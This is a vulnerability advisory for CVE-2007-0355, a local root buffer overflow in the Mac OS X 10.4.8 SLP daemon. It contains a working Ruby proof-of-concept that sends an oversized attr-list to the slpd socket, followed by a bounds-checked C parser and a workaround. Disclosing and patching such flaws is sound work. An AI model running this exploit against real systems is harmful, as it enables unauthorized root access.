Affected systems:
Apple Mac OS X 10.4.8
Apple Mac OS X Server 10.4.8
Description:
BUGTRAQ ID: 22101
CVE(CAN) ID: CVE-2007-0355
Apple Mac OS X is the operating system used on Apple's family of machines.
The Service Location Protocol (SLP) daemon shipped with Mac OS X has a buffer overflow in its handling of the attr-list field of a registration request. A local unprivileged user can trigger it by submitting a crafted request, leading to execution of arbitrary code with root privileges.
<*Source: Kevin Finisterre (dotslash@snosoft.com), LMH (lmh@info-pull.com)
Links: http://projects.info-pull.com/moab/MOAB-17-01-2007.html
http://secunia.com./advisories/23796/ *>
Test method:
#!/usr/bin/ruby
# (c) Copyright 2006 Lance M. Havok <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
# All pwnage reserved.
#
# Proof of concept for MOAB-17-01-2007
# http://projects.info-pull.com/moab/MOAB-17-01-2007.html
#
# Originally reported to Apple by Kevin, on 08/02/2006.

require 'socket'

target_path = (ARGV[0] || '/var/run/slp_ipc')
slp_socket = UNIXSocket.open(target_path)

payload = ("\x58" * 506)
payload << [0xdeadbeef].pack("V") # ...it expects a valid mem. address (ex. 0xbffff398)

stream = "\x01" +                          # SrvRqst = 1
         "\x00\x13" +                      # Length of remaining fields? (up to attr-list)
         "\x04\x00\x00\x00\x00\x00\x00" +
         "\x00\x02\x00\x00" +              # length of scope-list string
         "\x78\x78" +                      # <scope-list>
         "\xff\x03\x00\x00" +              # length of attr-list string 0x3ff = 1023 in hex.
         (payload)                         # <attr-list>

slp_socket.write stream
slp_socket.close
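As an added example (not code from the advisory, nor from Apple's slpd), a bounds-checked reader for the attr-list field in the message layout the proof of concept above sends. The field offsets and the little-endian read of the length field are assumptions taken from that byte string, and ATTR_LIST_BUF is a placeholder for the daemon's real buffer size; check_msg builds constructed messages in that layout for testing.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ATTR_LIST_BUF    256  /* placeholder for the daemon's buffer size (assumed) */
#define ATTR_LEN_OFFSET  16   /* id(1) + len(2) + 7 fixed + scope len(4) + "xx"(2) */
#define ATTR_DATA_OFFSET 20

/* Little-endian 32-bit read: the PoC reads "\xff\x03\x00\x00" as 0x3ff = 1023. */
static uint32_t rd_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Copy the attr-list into out and return its length, or -1 to reject the message.
 * The declared length is checked against the bytes actually received and against
 * the destination size; copying by the declared length alone is the flaw the
 * advisory describes. */
int read_attr_list(const unsigned char *msg, size_t msg_len, char *out)
{
    if (msg_len < ATTR_DATA_OFFSET || msg[0] != 0x01) /* truncated, or not SrvRqst */
        return -1;
    uint32_t declared = rd_le32(msg + ATTR_LEN_OFFSET);
    if (declared > msg_len - ATTR_DATA_OFFSET)        /* claims more than was sent */
        return -1;
    if (declared >= ATTR_LIST_BUF)                    /* would not fit, keep room for NUL */
        return -1;
    memcpy(out, msg + ATTR_DATA_OFFSET, declared);
    out[declared] = '\0';
    return (int)declared;
}

/* Build a constructed message in the PoC layout: a header claiming `declared`
 * bytes of attr-list, followed by `actual` bytes of 'X'. Returns the check result. */
int check_msg(uint32_t declared, size_t actual)
{
    static unsigned char msg[4096];
    char out[ATTR_LIST_BUF];
    if (ATTR_DATA_OFFSET + actual > sizeof msg) return -2;
    memset(msg, 0, sizeof msg);
    msg[0] = 0x01; msg[2] = 0x13; msg[3] = 0x04;  /* SrvRqst + fixed header bytes as in the PoC */
    msg[11] = 0x02; msg[14] = msg[15] = 'x';     /* scope-list length bytes and "xx" as in the PoC */
    for (int i = 0; i < 4; i++)
        msg[ATTR_LEN_OFFSET + i] = (unsigned char)(declared >> (8 * i));
    memset(msg + ATTR_DATA_OFFSET, 'X', actual);
    return read_attr_list(msg, ATTR_DATA_OFFSET + actual, out);
}
```

A message shaped like the PoC (1023 declared, 510 present) is rejected on the over-claim check before any copy; a fully present attr-list larger than the buffer is rejected on the size check.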
Recommendation:
Temporary workaround:
* Disable Personal File Sharing and slpd.
Vendor patch:
Apple
-----
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
http://www.apple.com